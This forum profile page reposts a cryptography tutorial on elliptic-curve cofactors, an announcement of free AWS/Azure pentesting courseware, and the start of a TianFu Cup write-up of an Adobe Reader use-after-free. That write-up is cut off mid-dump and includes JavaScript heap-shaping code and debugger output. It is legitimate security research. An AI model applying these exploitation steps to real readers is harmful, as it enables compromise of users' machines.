Jump to content

Nytro

Administrators
  • Posts

    18750
  • Joined

  • Last visited

  • Days Won

    722

Everything posted by Nytro

  1. April 2020 Cofactor Explained: Clearing Elliptic Curves' dirty little secret Much of public key cryptography uses the notion of prime-order groups. We first relied on the difficulty of the Discrete Logarithm Problem. Problem was, Index Calculus makes DLP less difficult than it first seems. So we used longer and longer keys – up to 4096 bits (512 bytes) in 2020 – to keep up with increasingly efficient attacks. Elliptic curves solved that. A well chosen, safe curve can only be broken by brute force. In practice, elliptic curve keys can be as small as 32 bytes. On the other hand, elliptic curves were not exactly fast, and the maths involved many edge cases and subtle death traps. Most of those problems were addressed by Edwards curves, which have a complete addition law with no edge cases, and Montgomery curves, with a simple and fast scalar multiplication method. Those last curves however did introduced a tiny little problem: their order is not prime. (Before we dive in, be advised: this is a dense article. Don't hesitate to take the time you need to digest what you've just read and develop an intuitive understanding. Prior experience with elliptic curve scalar multiplication helps too.) Prime-order groups primer First things first: what's so great about prime-order groups? What's a group anyway? What does "order" even mean? A group is the combination of a set of elements "G", and an operation "+". The operation follows what we call the group laws. For all a and b in G, a+b is also in G (closure). For all a, b, and c in G, (a+b)+c = a+(b+c) (associativity). There's an element "0" such that for all a, 0+a = a+0 = a (identity element). For all a in G, there's an element -a such that a + -a = 0 (inverse element). Basically what you'd expect from good old addition. The order of a group is simply the number of elements in that group. To give you an example, let's take G = [0..15], and define + as binary exclusive or. All laws above can be checked. It's order is 16 (there are 16 elements). Note some weird properties. For instance, each element is its own inverse (a xor a is zero). More interesting are cyclic groups, which have a generator: an element that repeatedly added to itself can walk through the entire group (and back to itself, so it can repeat the cycle all over again). Cyclic groups are all isomorphic to the group of non-negative integers modulo the same order. Let's take for instance [0..9], with addition modulo 10. The number 1 is a generator of the group: 1 = 1 2 = 1+1 3 = 1+1+1 4 = 1+1+1+1 5 = 1+1+1+1+1 6 = 1+1+1+1+1+1 7 = 1+1+1+1+1+1+1 8 = 1+1+1+1+1+1+1+1 9 = 1+1+1+1+1+1+1+1+1 0 = 1+1+1+1+1+1+1+1+1+1 1 = 1+1+1+1+1+1+1+1+1+1+1 (next cycle starts) 2 = 1+1+1+1+1+1+1+1+1+1+1+1 etc. Not all numbers are generators of the entire group. 5 for instance can generate only 2 elements: 5, and itself. 5 = 5 0 = 5+5 5 = 5+5+5 (next cycle starts) 0 = 5+5+5+5 etc. Note: we also use the word "order" to speak of how many elements are generated by a given element. In the group [0..9], 5 "has order 2", because it can generate 2 elements. 1, 3, 7, and 9 have order 10. 2, 4, 6, and 8 have order 5. 0 has order 1. Finally, prime-order groups are groups with a prime number of elements. They are all cyclic. What's great about them is their uniform structure: every element (except zero) can generate the whole group. Take for instance the group [0..10] (which has order 11). Every element except 0 is a generator: (Note: from now on, I will use the notation A.4 to denote A+A+A+A. This is called "scalar multiplication" (in this example, the group element is A and the scalar is 4). Since addition is associative, various tricks can speed up this scalar multiplication. I use a dot instead of "×" so we don't confuse it with ordinary multiplication, and to remind that the group element on the left of the dot is not necessarily a number.) 1.1 = 1 2.1 = 2 3.1 = 3 4.1 = 4 1.2 = 2 2.2 = 4 3.2 = 6 4.2 = 8 1.3 = 3 2.3 = 6 3.3 = 9 4.3 = 1 1.4 = 4 2.4 = 8 3.4 = 1 4.4 = 5 1.5 = 5 2.5 = 10 3.5 = 4 4.5 = 9 1.6 = 6 2.6 = 1 3.6 = 7 4.6 = 2 etc. 1.7 = 7 2.7 = 3 3.7 = 10 4.7 = 6 1.8 = 8 2.8 = 5 3.8 = 2 4.8 = 10 1.9 = 9 2.9 = 7 3.9 = 5 4.9 = 3 1.10 = 10 2.10 = 9 3.10 = 8 4.10 = 7 1.11 = 0 2.11 = 0 3.11 = 0 4.11 = 0 You get the idea. In practice, we can't distinguish group elements from each other: apart from zero, they all have the same properties. That's why discrete logarithm is so difficult: there is no structure to latch on to, so an attacker would mostly have to resort to brute force. (Okay, I lied. Natural numbers do have some structure to latch on to, which is why RSA keys need to be so damn huge. Elliptic curves – besides treacherous exceptions – don't have a known exploitable structure.) The cofactor So what we want is a group of order P, where P is a big honking prime. Unfortunately, the simplest and most efficient elliptic curves out there – those that can be expressed in Montgomery and Edwards form – don't give us that. Instead, they have order P×H, where P is suitably large, and H is a small number (often 4 or 8): the cofactor. Let's illustrate this with the cyclic group [0..43], of order 44. How much structure can we latch on to? 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 Since 44 is not prime, not all elements will have order 44. For instance: 1 has order 44 2 has order 22 3 has order 44 4 has order 11 … You get the idea. When we go over all numbers, we notice that the order of each element is not arbitrary. It is either 1, 2, 4, 11, 22, or 44. Note that 44 = 11 × 2 × 2. We can see were the various orders come from: 1, 2, 2×2, 11, 11×2, 11×2×2. The order of an element is easy to test: just multiply by the order to test, see if it yields zero. For instance (remember A.4 is a short hand for A+A+A+A, and we're working modulo 44 – the order of the group): 8 . 11 = 0 -- prime order 24 . 11 = 0 -- prime order 25 . 11 = 33 -- not prime order 11 . 4 = 0 -- low order 33 . 4 = 0 -- low order 25 . 4 = 12 -- not low order ("Low order" means orders below 11: 1, 2, 4. Not much lower than 11, but if we replace 11 by a large prime P, the term "low order" makes more sense.) Understandably, there are only few elements of low order: 0, 11, 22, and 33. 0 has order 1, 22 has order 2, 11 and 33 have order 4. Like the column on the left, they form a proper subgroup. It's easier to see by swapping and rotating the columns a bit: 0 11 22 33 4 15 26 37 8 19 30 41 12 23 34 1 16 27 38 5 20 31 42 9 24 35 2 13 28 39 6 17 32 43 10 21 36 3 14 25 40 7 18 29 The low order subgroup is shown on the first line. And now we can finally see the structure of this group: a narrow rectangle, with 11 lines and 4 columns, where each element in this rectangle is the sum of an element of prime order, and an element of low order. For instance: 30 = 8 + 22 = 4.2 + 11.2 35 = 24 + 11 = 4.6 + 11.1 1 = 12 + 33 = 4.3 + 11.3 You just have to look left and up to know which elements to sum. To do this algebraically, you need to multiply by the right scalar. You need to clear the (co)factor. Let's first look left. How do we clear the cofactor? We start by an element that can be expressed thus: E = 4.a + 11.b What we want to find is the scalar s such that E.s = 4.a Note that E.s = (4.a + 11.b).s E.s = 4.a.s + 11.b.s E.s = 4.(a×s) + 11.(b×s) E.s = 4.(a×1) + 11.(b×0) Recall that 4 has order 11, and 11 has order 4. So s must follow these equations: s = 1 mod 11 -- preserve a s = 0 mod 4 -- absorb b There's only one such scalar between 0 and 44: 12. So, multiplying by 12 clears the cofactor, and preserves the prime factor. For instance: 13.12 = 24 27.12 = 16 42.12 = 20 Now we know how to look left. To look up, we follow the same reasoning, except this time, our scalar s must follow these equations: s = 0 mod 11 -- absorb a s = 1 mod 4 -- preserve b That's 33. For instance: 13.33 = 33 27.33 = 11 42.33 = 22 Now we can look up as well. (Note: This "looking up" and "looking left" terminology isn't established mathematical terminology, but rather a hopefully helpful illustration. Do not ask established mathematicians or cryptographers about "looking up" and "looking left" without expecting them to be at least somewhat confused.) Torsion safe representatives We now have an easy way to project elements in the prime-order subgroup. Just look left by multiplying the element by the appropriate scalar (in the case of our [0..43] group, that's 12). That lets us treat each line of the rectangle as an equivalence class, with one canonical representative: the leftmost element – the one that is on the prime-order subgroup. This effectively gets us what we want: a prime-order group. Let's say we have a scalar s and an element E, which are not guaranteed to be on the prime-order subgroup. We want to know in which line their scalar multiplication will land, and we want to represent that line by its leftmost element. To do so, we just need to perform the scalar multiplication, then look left. For instance: s = 7 -- some random scalar E = 31 -- some random point E.s = 41 result = (E.s).12 = 8 Or we could first project E to the left, then perform the scalar multiplication. It will stay on the left column, and give us the same result: E = 31 E . 12 = 20 result = (E.12).s = 8 The problem with this approach is that it is slow. We're performing two scalar multiplications instead of just one. That kind of defeats the purpose of choosing a fast curve to begin with. We need something better. Let us look at our result one more time: result = (E.s).12 = 8 result = (E.12).s = 8 It would seem the order in which we do the scalar multiplications does not matter. Indeed, the associativity of group addition means we can rely on the following: (E.s).t = E.(s×t) = E.(t×s) = (E.t).s Now you can see that we can avoid performing two scalar multiplications, and multiply the two scalars instead. To go back to our example: s = 7 -- our random scalar E = 31 -- our random point result = E.(7×12) -- scalarmult and look left result = E.(84) result = E.(40) -- because 84 % 44 = 40 result = 8 Remember we are working with a cyclic group of order 44: adding an element to itself 84 times is like adding it to itself 44 times (the result is zero), and again 40 times. So better reduce the scalar modulo the group order so we can have a cheaper scalar multiplication. Let's recap: s = 7 -- our random scalar E = 31 -- our random point E.s = 41 E.(s×12) = 8 41 and 8 are on the same line, and 8 is in the prime-order subgroup. Multiplying by s×12 instead of s preserved the main factor, and cleared the cofactor. Because of this, we call s×12 the torsion safe representative of s. Now computing (s×12) % 44 may be simple, but it doesn't look very cheap. Thankfully, we're not out of performance tricks: (s×12) % 44 = (s×(11+1)) % 44 = (s×(11+1)) % 44 = (s + (s × 11)) % 44 = s + (s × 11) % 44 -- we assume s < 11 = s + (s%4 × 11) -- we can remove %44 We only need to add s and and a multiple of 11 (0, 11, 2×11, or 3×11). The result is guaranteed to be under the group order (44). The total cost is: Multiplying the prime order by a small number. Adding two scalars together. Compared to the scalar multiplication, that's practically free. Decoupling main factor and cofactor We just found the torsion safe representative of a scalar, that after scalar multiplication preserves the line, and only chooses the left column. In some cases, we may want to reverse roles: preserve the column, and and only chose the top line. In other words, we want to do the equivalent of performing the scalar multiplication, then looking up. The reasoning is the same as for torsion safe representatives, only flipped on its head. Instead of multiplying our scalar by 12 (which is a multiple of the low order, equals 1 modulo the prime order), we want to multiply it by 33: a multiple of the prime order, which equals 1 modulo the low order. Again, modular multiplication by 33 is not cheap, so we repeat our performance trick: (s×33) % 44 = (s×11×3) % (11×4) = ((s×3) % 4) × 11 In this case, we just have to compute (s×3) % 4 and multiply the prime order by that small number. The total cost is just the multiplication of the order by a very small number. Now we can do the decoupling: s = 7 -- some random scalar E = 31 -- some random point E.s = 41 -- normal result E.(s×12) = 8 E.(s×33) = 33 E.s = 8 + 33 = 41 -- decoupled result Cofactor and discrete logarithm Time to start applying our knowledge. Let's say I have elements A and B, and a scalar s such that B = A.s. The discrete logarithm problem is about finding s when you already know A and B. If we're working in a prime-order group with a sufficiently big prime, that problem is intractable. But we're not working with a prime-order group. We have a cofactor to deal with. Let's go back to our group of order 44: 0 11 22 33 4 15 26 37 8 19 30 41 12 23 34 1 16 27 38 5 20 31 42 9 24 35 2 13 28 39 6 17 32 43 10 21 36 3 14 25 40 7 18 29 We can easily recover the line and the column of A and B, so let's do that. Take for instance A = 27 and B = 15. Now let's find s. A = 27 A = 16 + 11 A = 4.4 + 11.1 B = 15 B = 4 + 11 B = 4.1 + 11.1 B = A . s 4.1 + 11.1 = (4.4 + 11.1) . s 4.1 + 11.1 = (4.4).s + (11.1).s 4 .1 = (4 .4).s 11.1 = (11.1).s Now look at that last line. Since 11 has only order 4, there are only 4 possible solutions, which are easy to brute force. We can try them all and easily see that: 11 . 1 = (11.1).1 (mod 44) s mod 4 = 1 The other equation however is more of a problem. There are 11 possible solutions, and trying them all is more expensive: 4 . 1 ≠ (4.4).1 4 . 1 ≠ (4.4).2 4 . 1 = (4.4).3 s mod 11 = 3 Now that we know both moduli, we can deduce that s = 25: A . s = B 27.25 = 15 What we just did here is reducing the discrete logarithm into two, easier discrete logarithms. Such divide and conquer is the reason why we want prime-order groups, where the difficulty of the discrete logarithm is the square root of the prime order (square root because there are cleverer brute force methods than just trying all possibilities). Here however, the difficulty wasn't the square root of 44. It was sqrt(11) + sqrt(2) + sqrt(2), which is significantly lower. The elliptic curves we are interested in however have much bigger orders. Curve25519 for instance has order 8 × L where L is 2²⁵² + something (and the cofactor is 8). So the difficulty of solving discrete logarithm for Curve25519 is sqrt(2)×3 + sqrt(2²⁵²), or approximately 2¹²⁶. Still lower than sqrt(8×L) (about 2¹²⁷), but not low enough to be worrying: discrete logarithm is still intractable. Cofactor and X25519 Elliptic curves can have a small cofactor, and still guarantee we can't solve discrete logarithm. There's still a problem however: the attacker can still solve the easy half of discrete logarithm, and deduce the value of s, modulo the cofactor. In the case of Curve25519, that means 3 bits of information, that could be read, or even controlled by the attacker. That's not ideal, so DJB rolled two tricks up his sleeve: The chosen base point of the curve has order L, not 8×L. Multiplying that point by our secret scalar, can then only generate points on the prime-order subgroup (the leftmost column). The three bits of information the attacker could have had are just absorbed by that base point. The scalar is clamped. Bit 255 is cleared and bit 254 is set to prevent timing leaks in poor implementations, and put a lower bound on standard attacks. More importantly, bits 0, 1, and 2 are cleared, to make sure the scalar is a multiple of 8. This guarantees that the low order component of the point, if any, will be absorbed by the scalar multiplication, such that the resulting point will be on the prime-order subgroup. The second trick is especially important: it guarantees that the scalar multiplication between your secret key and an attacker controlled point on the curve can only yield two kinds of results: A point on the curve, that has prime order. The attacker don't learn anything about your private key (at least not without solving discrete logarithm first), and they can't control which point on the curve you are computing. We're good. Zero. Okay, the attacker did manage to force this output, but this only (and always) happens when they gave you a low order point. So again, they learned nothing about your private key. And if you needed to check for low order output (some protocols, like CPace, require this check), you only need to make sure it's not zero (use a constant-time comparison, please). (I'm ignoring what happens if the point you're multiplying is not on the curve. Failing to account for that has broken systems in the past. X25519 however only transmits the x-coordinate of the point, so the worst you can have is a point on the "twist". Since the twist of Curve25519 also has a big prime order (2²⁵³ minus something) and a small cofactor (4), the results will be similar, and the attacker will learn nothing. Curve25519 is thus "twist secure".) Cofactor and Elligator Elligator was developed to help with censorship circumvention. It encodes points on the curve so that if the point is selected at random, its encoding will be indistinguishable from random. With that tool, the entire cryptographic communication is fully random, including initial ephemeral keys. This enables the construction of fully random formats, and facilitates steganography. Communication protocols often require ephemeral keys to initiate communications. In practice, they need to generate a random key pair, and send the public half over the network. Public keys however will not necessarily look random, even though the private half was indeed random. Curve25519 for instance have a number of biases: Curve25519 points are encoded in 255 bits (we only encode the x-coordinate). Since all communication happens at the byte level, there is one unused bit, which is usually cleared. This is easily remedied by simply randomising the unused bit. The x-coordinate of Curve25519 points does not span all values from 0 to 2²⁵⁵-1. Values 2²⁵⁵-19 and above never occur. In practice though, this bias is small enough to be utterly undetectable. Curve25519 points satisfy the equation y² = x³ + 486662 x² + x. All the attacker has to do is take the suspected x-coordinate, compute the right hand side of the equation, and check whether this is a square in the finite field GF(2²⁵⁵-19). For random strings, it will be about half the time. if it is a Curve25519 x-coordinate, it will be all the time. The remedy is Elligator mappings, which can decode all numbers from 0 to 2²⁵⁵-20 into a point on the curve. Encoding fails about half the time, but we can try generating key pair until we find one that can be turned into a random looking encoding. X25519 keys aren't selected at random to begin with: because of cofactor clearing, they are taken from the prime-order subgroup. Even with Elligator mappings, an attacker can decode the point, and check whether it belongs to the prime-order subgroup. Again, with X25519, this would happen all the time, unlike random representatives. When I first discovered this problem, I didn't know what to do. The remedy is fairly simple once I understood the cofactor. The real problem was reaching that understanding. So, our problem is to generate a key pair, where the public half is a random point on the whole curve, not just the prime-order subgroup. Let's again illustrate it with the [0..43] group: 0 11 22 33 4 15 26 37 8 19 30 41 12 23 34 1 16 27 38 5 20 31 42 9 24 35 2 13 28 39 6 17 32 43 10 21 36 3 14 25 40 7 18 29 Recall that the prime-order subgroup is the column on the left, and the low order subgroup is the first line. X25519 is designed in such a way that: The chosen generator of the curve has prime order. The private key is a multiple of the cofactor. For us here, this means our generator is 4, and our private key is a multiple of 4. You can check that multiplying 4 by a multiple of 4 will always yield a multiple of… 4. An element on the left column. (Remember, we're working modulo 44). But that's no good. I want to select a random element on the whole rectangle, not just the left column. If we recall our cofactor lessons, the solution is simple: add a random low order element. The random prime-order element selects the line, and the random low order element selects the column. Adding them together gives us a random element over the whole group. To add icing on the cake, this method is compatible X25519. Let's take an example. Let's first have a regular key exchange: B = 4 -- Generator of the prime-order group sa = 20 -- Alice's private key sb = 28 -- Bob's private key SA = B.sa = 4.20 = 36 -- Alice's public key SB = B.sb = 4.28 = 24 -- Bob's public key ssa = SB.sa = 24.20 = 40 -- Shared secret (computed by Alice) ssb = SA.sb = 36.28 = 40 -- Shared secret (computed by Bob) As expected of Diffie–Hellman, Alice and Bob compute the same shared secret. Now, what happens if Alice adds a low order element to properly hide her key? Let's say she adds 11 (an element of order 4). LO = 11 -- random low order point HA = SA+LO = 36+11 = 3 -- Alice's "hidden" key ssb = HA.sb = 3.28 = 40 Bob still computes the same shared secret! Which by now should not be a big surprise: scalars that are a multiple of the cofactor absorb the low order component, effectively projecting the result back in the prime order subgroup. Applying this to Curve25519 is straightforward: Select a random number, then clamp it as usual. It is now a multiple of the cofactor of the curve (8). Multiply the Curve25519 base point by that scalar. Add a low order point at random. There's a little complication, though. X25519 works on Montgomery curves, which are optimised for an x-coordinate only ladder. That ladder takes advantage of differential addition. Adding a low order point requires arbitrary addition, whose code is neither trivial nor available. We can work around that problem by starting from Edwards25519 instead: Select a random number, then clamp it as usual. It is now a multiple of the cofactor of the curve (8). Multiply the Edwards25519 base point by that scalar. Add a low order point at random. (By the way, be sure the selection of the low order point happens in constant time. Avoid naive array lookup tables.) Convert the result to Curve25519 (clamping guarantees we do not hit the treacherous exceptions of the birational map). The main advantage here is speed: Edwards25519 scalar multiplication by the base point often takes advantage of pre-computed tables, making it much faster than the Montgomery ladder in practice. (Note: pre-computed tables don't really apply to key exchange, which is why X22519 uses the Montgomery ladder instead.) This has a price however: we now depend on EdDSA code, which is not ideal if we don't compute signatures as well. Moreover, some libraries, like TweetNaCl avoid pre-computed tables to simplify the code. This makes Edwards scalar multiplication slower than the Montgomery ladder. Alternatively, there is a way to stay in Montgomery space: change the base point. Let's try it with the [0..43] group. Instead of using 4 as the base point, we'll add 11, a point whose order is the same as the cofactor (4). Our "dirty" base point is 15 (4+11). Now let's multiply that by Alice's public key: O = 11 -- low order point (order 4) B = 4 -- base point (prime order) D = B+LO = 11+4 = 15 -- "dirty" base point sa = 20 -- Alice's private key SA = B.sa = 4.20 = 36 -- Alice's public key HA = D.sa = 15.20 = 36 -- ??? Okay we have a problem: even with the dirty base point, we get the same result. That's because Alice's private key is still a multiple of the cofactor, and absorbs the low order component. But we don't want to absorb it, we want to use it, to select a column at random. Here's the trick: Use a multiple of the cofactor (4) to select the line. Use a multiple of the prime order (11) to select the column. Add those two numbers. Multiply the dirty base point by it. Note the parallel with EdDSA: we were adding points, now we add scalars. But the result is the same: d = 33 -- random multiple of the prime order da = sa+d = 20+33 = 9 -- Alice's "dirty" secret key HA = D.da = 15. 9 = 3 -- Alice's hidden key Note that we can ensure both methods yield the same results by properly decoupling the main factor and the cofactor. Now we can apply the method to Curve25519: Add a low order point of order 8 to the base point. That's our new, "dirty" base point. That can be done offline, and the result hard coded. (I personally added the Edwards25519 to a low order Edwards point, then converted the result to Montgomery.) Select a random number, then clamp it as usual. It is now a multiple of the cofactor of the curve (8). Note that if we multiply the dirty base point by that scalar, we'd absorb the low order point all over again. Select a random multiple of the prime order. For Curve25519, that means, 0, L, 2L… up to 7L. Add that multiple of L to the clamped random number above. Multiply the resulting scalar by the dirty base point. That way we no longer need EdDSA code. (Note: you can look at actual code in the implementation of the crypto_x25519_dirty_*() functions in my Monocypher cryptographic library.) Cofactor and scalar inversion Scalar inversion is useful for exponential blinding to implement Oblivious Pseudo-Random Functions (OPRF). (It will make sense soon, promise). Let's say Alice wants to connect to Bob's server, with her password. To maximise security, they use the latest and greatest in authentication technology (augmented PAKE). One important difference between that and your run of the mill password based authentication, is that Alice doesn't want to transmit her password. And Bob certainly doesn't want to transmit the salt to anyone but Alice, that would be the moral equivalent of publishing his password database. Yet we must end up somehow with Alice knowing something she can use as the salt: a blind salt, which must be a function of the password and the salt only: Blind_salt = f(password, salt) One way to do this is with exponential blinding. We start by having Alice compute a random point on the curve, which is a function of the password: P = Hash_to_point(Hash(password)) That will act as a kind of secret, hidden base point. The Hash_to_point() function can use the Elligator mappings. Note that even though P is the base point multiplied by some scalar, we cannot recover the value of that scalar (if we could, it would mean Elligator mappings could be used to solve discrete logarithm). Now Alice computes an ephemeral key pair with that base point: r = random() R = P . r She sends R to Bob. Note that as far as Bob (or any attacker) is concerned, that point R is completely random, and has no correlation with the password, or its hash. The difficulty of discrete logarithm prevents them to recover P from R alone. Now Bob uses R to transmit the blind salt: S = R . salt He sends S back to Alice, who then computes the blind salt: Blind_salt = S . (1/r) -- assuming r × (1/r) = 1 Let's go over the whole protocol: P = Hash_to_point(Hash(password)) r = random() R = P . r S = R . salt Blind_salt = S . (1/r) Blind_salt = R . salt . (1/r) Blind_salt = P . r . salt . (1/r) Blind_salt = P . (r × salt × (1/r)) Blind_salt = P . salt Blind_salt = Hash_to_point(Hash(password)) . salt And voila, our blind salt depends solely on the password and salt. You need to know the password to compute it from the salt, and if Mallory tries to connect to Bob, guessing the wrong password will give her a totally different, unexploitable blind salt. Offline dictionary attack is not possible without having hacked the database first. Now this is all very well, if we are working on a prime-order subgroup. Scalars do have an inverse modulo the order of the curve, hash to point will give us what we want… except nope, our group does not have prime order. We need to deal with the cofactor, somehow. The first problem with the cofactor comes from Hash_to_point(). When Elligator decodes a representative into a point on the curve, that point is not guaranteed to belong to the prime-order subgroup. There's the potential to leak up to 3 bits of information about the password (the cofactor of Curve25519 is 8). Fortunately, the point P is not transmitted over the network. Only R is. And this gives us the opportunity to clear the cofactor: R = P . r If the random scalar r is a multiple of 8, then R will be guaranteed to be on the prime-order subgroup, and we won't leak anything. X25519 has us covered: after clamping, r is a multiple of 8. This guarantee however goes out the window as soon as R is transmitted across the network: Mallory could instead send a bogus key that is not on the prime-order subgroup. (They could also send a point on the twist, but Curve25519 is twist secure, so let's ignore that.) Again though, X25519 takes care of this: S = R . salt Just clamp salt, and we again have a multiple of 8, and S will be guaranteed to be on the prime-order subgroup. Of course, Alice might receive some malicious S instead, so she can't assume it's the correct one. And this time, X25519 does not have us covered: Blind_salt = S . (1/r) See, X25519 clamping has a problem: while it clears the cofactor all right, it does not preserve the main factor. Which means clamping neither survives nor preserves algebraic transformations. Inverting r then clamping does not work. Clamping then inverting r does not clear the cofactor. The solution is torsion safe representatives: c = clamp(r) i = 1/c -- modulo L s = i × t -- t%L == 1 and t%8 == 0 Where L is the prime order of the curve. For Curve25519, t = 3×L + 1. The performance trick explained in the torsion safe representatives section apply as expected. (Note: you can look at actual code in the implementation of the crypto_x25519_inverse() function in Monocypher.) Conclusion Phew, done. I confess didn't think I'd need such a long post. But you get the idea: properly dealing with a cofactor these days is delicate. It's doable, but the cleaner solution these days is to use the Ristretto Group: you get modern curves and a prime order group. (Discuss on Hacker News, Reddit, Lobsters) Sursa: http://loup-vaillant.fr/tutorials/cofactor
  2. Breaking and Pwning Apps and Servers on AWS and Azure - Free Training Courseware and Labs Introduction The world is changing right in front of our eyes. The way we have been learning is going to be radically transformed by the time we all have eradicated the COVID19 from our lives. While we figure out what is the best way to transfer our knowledge to you, we realise that by the time world is out of the lockdown, a cloud focussed pentesting training is likely going to be obsolete in parts. So as a contribution towards the greater security community, we decided to open source the complete training. Hope you enjoy this release and come back to us with questions, comments, feedback, new ideas or anything else that you want to let us know! Looking forward to hacking with all of you! Description Amazon Web Services (AWS) and Azure run the most popular and used cloud infrastructure and boutique of services. There is a need for security testers, Cloud/IT admins and people tasked with the role of DevSecOps to learn on how to effectively attack and test their cloud infrastructure. In this tools and techniques based training we cover attack approaches, creating your attack arsenal in the cloud, distilled deep dive into AWS and Azure services and concepts that should be used for security. The training covers a multitude of scenarios taken from our vulnerability assessment, penetration testing and OSINT engagements which take the student through the journey of discovery, identification and exploitation of security weaknesses, misconfigurations and poor programming practices that can lead to complete compromise of the cloud infrastructure. The training is meant to be a hands-on training with guided walkthroughs, scenario based attacks, coverage of tool that can be used for attacking and auditing. Due to the attack, focused nature of the training, not a lot of documentation is around security architecture, defence in depth etc. Additional references are provided in case further reading is required. To proceed, you will need An AWS account, activated for payments (you should be able to open and view the Services > EC2 page) An Azure account, you should be able to login to the Azure console About this repo This repo contains all the material from our 3 day hands on training that we have delivered at security conferences and to our numerous clients. The primary things in this repo are: documentation - all documentation in markdown format that is to be used to go through the training setup-files - files required to create a student virtual machine that will be used to create the cloud labs extras - any additional files that are relevant during the training Getting started Clone this repo Setup the student VM Host the documentation locally using gitbook Follow the docs Step 1 - Setup the student VM the documentation to setup your own student virtual machine, which is required for the training, is under documentation/setting-up/setup-student-virtual-machine.md this needs to be done first Step 2 - Documentation As all documentation is in markdown format, you can use Gitbook to host a local copy while walking through the training Steps to do this install gitbook-cli (npm install gitbook-cli -g) cd into the documentation folder gitbook serve browse to http://localhost:4000 License Documentation and Gitbook are released under Creative Commons Attribution Share Alike 4.0 International Lab material including any code, script are release under MIT License Sursa: https://github.com/appsecco/breaking-and-pwning-apps-and-servers-aws-azure-training
  3. TianFu Cup 2019: Adobe Reader Exploitation Apr 10, 2020 Phan Thanh Duy Last year, I participated in the TianFu Cup competition in Chengdu, China. The chosen target was the Adobe Reader. This post will detail a use-after-free bug of JSObject. My exploit is not clean and not an optimal solution. I have finished this exploit through lots of trial and error. It involves lots of heap shaping code which I no longer remember exactly why they are there. I would highly suggest that you read the full exploit code and do the debugging yourself if necessary. This blog post was written based on a Windows 10 host with Adobe Reader. Vulnerability The vulnerability is located in the EScript.api component which is the binding layer for various JS API call. First I create an array of Sound object. SOUND_SZ = 512 SOUNDS = Array(SOUND_SZ) for(var i=0; i<512; i++) { SOUNDS[i] = this.getSound(i) SOUNDS[i].toString() } This is what a Sound object looks like in memory. The 2nd dword is a pointer to a JSObject which has elements, slots, shape, fields … etc. The 4th dword is string indicate the object’s type. I’m not sure which version of Spidermonkey that Adobe Reader is using. At first I thought this is a NativeObject but its field doesn’t seem to match Spidermonkey’s source code. If you know what this structure is or have a question, please contact me via Twitter. 0:000> dd @eax 088445d8 08479bb0 0c8299e8 00000000 085d41f0 088445e8 0e262b80 0e262f38 00000000 00000000 088445f8 0e2630d0 00000000 00000000 00000000 08844608 00000000 5b8c4400 6d6f4400 00000000 08844618 00000000 00000000 0:000> !heap -p -a @eax address 088445d8 found in _HEAP @ 4f60000 HEAP_ENTRY Size Prev Flags UserPtr UserSize - state 088445d0 000a 0000 [00] 088445d8 00048 - (busy) 0:000> da 085d41f0 085d41f0 "Sound" This 0x48 memory region and its fields are what is going to be freed and reused. Since AdobeReader.exe is a 32bit binary, I can heap spray and know exactly where my controlled data is in memory then I can overwrite this whole memory region with my controlled data and try to find a way to control PC. I failed because I don’t really know what all these fields are. I don’t have a memory leak. Adobe has CFI. So I turn my attention to the JSObject (2nd dword) instead. Also being able to fake a JSObject is a very powerful primitive. Unfortunately the 2nd dword is not on the heap. It is in a memory region which is VirtualAlloced when Adobe Reader starts. One important point to notice is the memory content is not cleared after they are freed. 0:000> !address 0c8299e8 Mapping file section regions... Mapping module regions... Mapping PEB regions... Mapping TEB and stack regions... Mapping heap regions... Mapping page heap regions... Mapping other regions... Mapping stack trace database regions... Mapping activation context regions... Usage: <unknown> Base Address: 0c800000 End Address: 0c900000 Region Size: 00100000 ( 1.000 MB) State: 00001000 MEM_COMMIT Protect: 00000004 PAGE_READWRITE Type: 00020000 MEM_PRIVATE Allocation Base: 0c800000 Allocation Protect: 00000004 PAGE_READWRITE Content source: 1 (target), length: d6618 I realized that ESObjectCreateArrayFromESVals and ESObjectCreate also allocates into this area. I used the currentValueIndices function to call ESObjectCreateArrayFromESVals: /* prepare array elements buffer */ f = this.addField("f" , "listbox", 0, [0,0,0,0]); t = Array(32) for(var i=0; i<32; i++) t[i] = i f.multipleSelection = 1 f.setItems(t) f.currentValueIndices = t // every time currentValueIndices is accessed `ESObjectCreateArrayFromESVals` is called to create a new array. for(var j=0; j<THRESHOLD_SZ; j++) f.currentValueIndices Looking at ESObjectCreateArrayFromESVals return value, we can see that our JSObject 0d2ad1f0 is not on the heap but its elements buffer at 08c621e8 are. The ffffff81 is tag for number, just as we have ffffff85 for string and ffffff87 for object. 0:000> dd @eax 0da91b00 088dfd50 0d2ad1f0 00000001 00000000 0da91b10 00000000 00000000 00000000 00000000 0da91b20 00000000 00000000 00000000 00000000 0da91b30 00000000 00000000 00000000 00000000 0da91b40 00000000 00000000 5b9868c6 88018800 0da91b50 0dbd61d8 537d56f8 00000014 0dbeb41c 0da91b60 0dbd61d8 00000030 089dfbdc 00000001 0da91b70 00000000 00000003 00000000 00000003 0:000> !heap -p -a 0da91b00 address 0da91b00 found in _HEAP @ 5570000 HEAP_ENTRY Size Prev Flags UserPtr UserSize - state 0da91af8 000a 0000 [00] 0da91b00 00048 - (busy) 0:000> dd 0d2ad1f0 0d2ad1f0 0d2883e8 0d225ac0 00000000 08c621e8 0d2ad200 0da91b00 00000000 00000000 00000000 0d2ad210 00000000 00000020 0d227130 0d2250c0 0d2ad220 00000000 553124f8 0da8dfa0 00000000 0d2ad230 00c10003 0d27d180 0d237258 00000000 0d2ad240 0d227130 0d2250c0 00000000 553124f8 0d2ad250 0da8dcd0 00000000 00c10001 0d27d200 0d2ad260 0d237258 00000000 0d227130 0d2250c0 0:000> dd 08c621e8 08c621e8 00000000 ffffff81 00000001 ffffff81 08c621f8 00000002 ffffff81 00000003 ffffff81 08c62208 00000004 ffffff81 00000005 ffffff81 08c62218 00000006 ffffff81 00000007 ffffff81 08c62228 00000008 ffffff81 00000009 ffffff81 08c62238 0000000a ffffff81 0000000b ffffff81 08c62248 0000000c ffffff81 0000000d ffffff81 08c62258 0000000e ffffff81 0000000f ffffff81 0:000> dd 08c621e8 08c621e8 00000000 ffffff81 00000001 ffffff81 08c621f8 00000002 ffffff81 00000003 ffffff81 08c62208 00000004 ffffff81 00000005 ffffff81 08c62218 00000006 ffffff81 00000007 ffffff81 08c62228 00000008 ffffff81 00000009 ffffff81 08c62238 0000000a ffffff81 0000000b ffffff81 08c62248 0000000c ffffff81 0000000d ffffff81 